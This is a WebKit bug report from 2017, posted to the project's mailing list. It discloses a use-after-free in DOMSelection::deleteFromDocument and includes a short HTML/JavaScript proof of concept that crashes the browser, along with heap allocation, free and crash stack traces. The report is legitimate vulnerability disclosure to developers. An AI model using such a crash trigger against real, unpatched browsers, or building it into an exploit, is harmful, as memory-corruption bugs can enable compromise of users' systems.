[Webkit-unassigned] [Bug 167232] New: WebCore::DOMSelection::deleteFromDocument use after free

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Thu Jan 19 23:57:50 PST 2017


https://bugs.webkit.org/show_bug.cgi?id=167232

            Bug ID: 167232
           Summary: WebCore::DOMSelection::deleteFromDocument use after
                    free
    Classification: Unclassified
           Product: WebKit
           Version: WebKit Local Build
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: New Bugs
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: yuanvi.cn at gmail.com

Environment:
windows 7 Ultimate 64bit
webkit local build with latest git commit d4c655ed0c90d076a473605d752c16adb321764e
enable page heap for MiniBrowser.exe


PoC:
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function start() {
    document.getElementById('input_0').disabled = true;
    document.getElementById('input_0').setRangeText(319, 193, 273);
    window.getSelection().extend(document.getElementById('input_0'));
    window.getSelection().deleteFromDocument();
}
</script>
</head>
<body onload="start();">
    <input id=input_0 type="search" name="fname"><br>
</body>
</html>


Description:
Open the PoC file with MiniBrowser; it will cause a UAF crash at {WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp @ 715]}. Note that this reduced PoC won't crash without page heap enabled.
I did not investigate this crash thoroughly, so I cannot determine whether it is easily exploitable.


Stack backtrace:
RtlAllocateHeap record:
    WTF+00059cfc WTF!_malloc_base+0x38 [d:\th\minkernel\crts\ucrt\src\appcrt\heap\malloc_base.cpp @ 29]
    WTF+0000645b WTF!WTF::fastMalloc+0xb [d:\webkit\source\wtf\wtf\fastmalloc.cpp @ 182]
    WebKit+0078d25b WebKit!WebCore::SearchFieldCancelButtonElement::create+0xb [d:\webkit\source\webcore\html\shadow\textcontrolinnerelements.cpp @ 222]
    WebKit+007a9134 WebKit!WebCore::SearchInputType::createShadowSubtree+0xa4 [d:\webkit\source\webcore\html\searchinputtype.cpp @ 117]
    WebKit+00449701 WebKit!WebCore::HTMLInputElement::didAddUserAgentShadowRoot+0x11 [d:\webkit\source\webcore\html\htmlinputelement.cpp @ 146]
    WebKit+00126def WebKit!WebCore::Element::ensureUserAgentShadowRoot+0x4f [d:\webkit\source\webcore\dom\element.cpp @ 1857]
    WebKit+0046bb4f WebKit!WebCore::HTMLInputElement::initializeInputType+0xbf [d:\webkit\source\webcore\html\htmlinputelement.cpp @ 663]
    WebKit+001267d4 WebKit!WebCore::Element::parserSetAttributes+0xa4 [d:\webkit\source\webcore\dom\element.cpp @ 1528]
    WebKit+0089160a WebKit!WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface+0x20a [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp @ 685]
    WebKit+0088f524 WebKit!WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement+0x14 [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp @ 507]
    WebKit+00894369 WebKit!WebCore::HTMLTreeBuilder::processStartTagForInBody+0x6a9 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 754]
    WebKit+00892e4b WebKit!WebCore::HTMLTreeBuilder::processStartTag+0x54b [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 1095]
    WebKit+00892713 WebKit!WebCore::HTMLTreeBuilder::constructTree+0x23 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 356]
    WebKit+006e8684 WebKit!WebCore::HTMLDocumentParser::pumpTokenizerLoop+0x224 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 260]
    WebKit+006e839a WebKit!WebCore::HTMLDocumentParser::pumpTokenizer+0x6a [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 284]
    WebKit+006e7ea4 WebKit!WebCore::HTMLDocumentParser::append+0x194 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 391]
    WebKit+00144c75 WebKit!WebCore::DecodedDataDocumentParser::appendBytes+0x65 [d:\webkit\source\webcore\dom\decodeddatadocumentparser.cpp @ 50]
    WebKit+006c0f5c WebKit!WebCore::DocumentWriter::addData+0x2c [d:\webkit\source\webcore\loader\documentwriter.cpp @ 254]
    WebKit+0019287d WebKit!WebCore::DocumentLoader::commitData+0x19d [d:\webkit\source\webcore\loader\documentloader.cpp @ 952]
    WebKit+000db050 WebKit!WebFrameLoaderClient::committedLoad+0x20 [d:\webkit\source\webkit\win\webcoresupport\webframeloaderclient.cpp @ 673]
    WebKit+001932d5 WebKit!WebCore::DocumentLoader::commitLoad+0x75 [d:\webkit\source\webcore\loader\documentloader.cpp @ 869]
    WebKit+0019432c WebKit!WebCore::DocumentLoader::dataReceived+0x7c [d:\webkit\source\webcore\loader\documentloader.cpp @ 984]
    WebKit+00193d7e WebKit!WebCore::DocumentLoader::dataReceived+0xe [d:\webkit\source\webcore\loader\documentloader.cpp @ 958]
    WebKit+00717a8a WebKit!WebCore::CachedRawResource::notifyClientsDataWasReceived+0x4a [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 118]
    WebKit+007175ab WebKit!WebCore::CachedRawResource::addDataBuffer+0x9b [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 69]
    WebKit+0019f30e WebKit!WebCore::SubresourceLoader::didReceiveDataOrBuffer+0x8e [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 391]
    WebKit+0019ec68 WebKit!WebCore::SubresourceLoader::didReceiveBuffer+0x28 [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 371]
    WebKit+00199e44 WebKit!WebCore::ResourceLoader::didReceiveBuffer+0x14 [d:\webkit\source\webcore\loader\resourceloader.cpp @ 635]
    WebKit+0071e9e3 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didReceiveData+0x33 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp @ 185]
    WebKit+0071e581 WebKit!WebCore::ResourceHandleCFURLConnectionDelegate::didReceiveDataCallback+0x11 [d:\webkit\source\webcore\platform\network\cf\resourcehandlecfurlconnectiondelegate.cpp @ 84]
    CFNetwork+0015c5b9 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xc579:

RtlFreeHeap record:
    kernel32+000114dd kernel32!HeapFree+0x14:
    WTF+000583e5 WTF!_free_base+0x1c [d:\th\minkernel\crts\ucrt\src\appcrt\heap\free_base.cpp @ 107]
    WebKit+00467bcd WebKit!WebCore::HTMLParamElement::`scalar deleting destructor'+0x1d:
    WebKit+0016b906 WebKit!WebCore::RangeBoundaryPoint::~RangeBoundaryPoint+0x36:
    WebKit+00138e6f WebKit!WebCore::Range::deleteContents+0x1f [d:\webkit\source\webcore\dom\range.cpp @ 470]
    WebKit+007620e3 WebKit!WebCore::DOMSelection::deleteFromDocument+0x63 [d:\webkit\source\webcore\page\domselection.cpp @ 378]
    WebKit+00983439 WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp @ 459]
    +0000347d Error(Call IDebugControl::ExecuteWide failed    HRESULT 0x80040205)
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 7940]
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 7940]
    JavaScriptCore+004ee93d JavaScriptCore!vmEntryToJavaScript+0x10d [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 114]
    JavaScriptCore+002769d7 JavaScriptCore!JSC::JITCode::execute+0x57 [d:\webkit\source\javascriptcore\jit\jitcode.cpp @ 81]
    JavaScriptCore+0025a061 JavaScriptCore!JSC::Interpreter::executeCall+0x191 [d:\webkit\source\javascriptcore\interpreter\interpreter.cpp @ 927]
    JavaScriptCore+0038284f JavaScriptCore!JSC::call+0x4f [d:\webkit\source\javascriptcore\runtime\calldata.cpp @ 47]
    JavaScriptCore+003829b9 JavaScriptCore!JSC::profiledCall+0x59 [d:\webkit\source\javascriptcore\runtime\calldata.cpp @ 65]
    WebKit+004f5942 WebKit!WebCore::JSMainThreadExecState::profiledCall+0x62 [d:\webkit\source\webcore\bindings\js\jsmainthreadexecstate.h @ 75]
    WebKit+004cbb1e WebKit!WebCore::JSEventListener::handleEvent+0x3ee [d:\webkit\source\webcore\bindings\js\jseventlistener.cpp @ 143]
    WebKit+0010289e WebKit!WebCore::EventTarget::fireEventListeners+0xfe [d:\webkit\source\webcore\dom\eventtarget.cpp @ 253]
    WebKit+001026f4 WebKit!WebCore::EventTarget::fireEventListeners+0xd4 [d:\webkit\source\webcore\dom\eventtarget.cpp @ 200]
    WebKit+002bcdb0 WebKit!WebCore::DOMWindow::dispatchEvent+0x100 [d:\webkit\source\webcore\page\domwindow.cpp @ 1994]
    WebKit+002bce83 WebKit!WebCore::DOMWindow::dispatchLoadEvent+0x83 [d:\webkit\source\webcore\page\domwindow.cpp @ 1952]
    WebKit+001137a8 WebKit!WebCore::Document::implicitClose+0x178 [d:\webkit\source\webcore\dom\document.cpp @ 2663]
    WebKit+002aedb4 WebKit!WebCore::FrameLoader::checkCompleted+0x84 [d:\webkit\source\webcore\loader\frameloader.cpp @ 825]
    WebKit+002aecef WebKit!WebCore::FrameLoader::finishedParsing+0x5f [d:\webkit\source\webcore\loader\frameloader.cpp @ 746]
    WebKit+00193dc6 WebKit!WebCore::DocumentLoader::notifyFinished+0x36 [d:\webkit\source\webcore\loader\documentloader.cpp @ 399]
    WebKit+00637e6c WebKit!WebCore::CachedResource::finishLoading+0xc [d:\webkit\source\webcore\loader\cache\cachedresource.cpp @ 328]
    WebKit+0019ed5a WebKit!WebCore::SubresourceLoader::didFinishLoading+0xca [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 545]
    WebKit+00199e65 WebKit!WebCore::ResourceLoader::didFinishLoading+0x15 [d:\webkit\source\webcore\loader\resourceloader.cpp @ 641]
    WebKit+0071ea34 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didFinishLoading+0x24 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp @ 193]
    CFNetwork+0015a2a1 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xa261:

Crash:
    0046ec2c 6cb67aa6 WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp @ 715]
    0046ec4c 6cb65a1b WebKit!WebCore::RenderSearchField::computeControlLogicalHeight+0xb6 [d:\webkit\source\webcore\rendering\rendersearchfield.cpp @ 148]
    0046ec88 6ca8a533 WebKit!WebCore::RenderTextControl::computeLogicalHeight+0xab [d:\webkit\source\webcore\rendering\rendertextcontrol.cpp @ 104]
    0046ecbc 6cabb9de WebKit!WebCore::RenderBox::updateLogicalHeight+0x43 [d:\webkit\source\webcore\rendering\renderbox.cpp @ 2780]
    0046ecd4 6cabac37 WebKit!WebCore::RenderBlockFlow::updateLogicalHeight+0xe [d:\webkit\source\webcore\rendering\renderblockflow.cpp @ 3227]
    0046ed68 6cb66493 WebKit!WebCore::RenderBlockFlow::layoutBlock+0x457 [d:\webkit\source\webcore\rendering\renderblockflow.cpp @ 544]
    0046eda8 6cca124c WebKit!WebCore::RenderTextControlSingleLine::layout+0xf3 [d:\webkit\source\webcore\rendering\rendertextcontrolsingleline.cpp @ 119]
    0046ee10 6c8a22df WebKit!WebCore::FrameView::layout+0x5ac [d:\webkit\source\webcore\page\frameview.cpp @ 1492]
    0046ee30 6c8a237a WebKit!WebCore::Document::updateLayout+0xcf [d:\webkit\source\webcore\dom\document.cpp @ 1907]
    0046ee44 6c9bef1e WebKit!WebCore::Document::updateLayoutIgnorePendingStylesheets+0x7a [d:\webkit\source\webcore\dom\document.cpp @ 1941]
    0046eeb8 6c9bedc5 WebKit!WebCore::VisiblePosition::canonicalPosition+0x7e [d:\webkit\source\webcore\editing\visibleposition.cpp @ 562]
    0046eeec 6c9c23f5 WebKit!WebCore::VisiblePosition::init+0x25 [d:\webkit\source\webcore\editing\visibleposition.cpp @ 60]
    0046ef3c 6c9c227e WebKit!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents+0x45 [d:\webkit\source\webcore\editing\visibleselection.cpp @ 250]
    0046ef58 6c9c1056 WebKit!WebCore::VisibleSelection::validate+0xe [d:\webkit\source\webcore\editing\visibleselection.cpp @ 422]
    0046ef68 6c9c4572 WebKit!WebCore::VisibleSelection::VisibleSelection+0xa6 [d:\webkit\source\webcore\editing\visibleselection.cpp @ 67]
    0046efe8 6cef1274 WebKit!WebCore::FrameSelection::moveTo+0x32 [d:\webkit\source\webcore\editing\frameselection.cpp @ 165]
    0046f02c 6cef212d WebKit!WebCore::DOMSelection::setBaseAndExtent+0x94 [d:\webkit\source\webcore\page\domselection.cpp @ 216]
    0046f068 6d113439 WebKit!WebCore::DOMSelection::deleteFromDocument+0xad [d:\webkit\source\webcore\page\domselection.cpp @ 379]
    0046f088 0a08347d WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp @ 459]
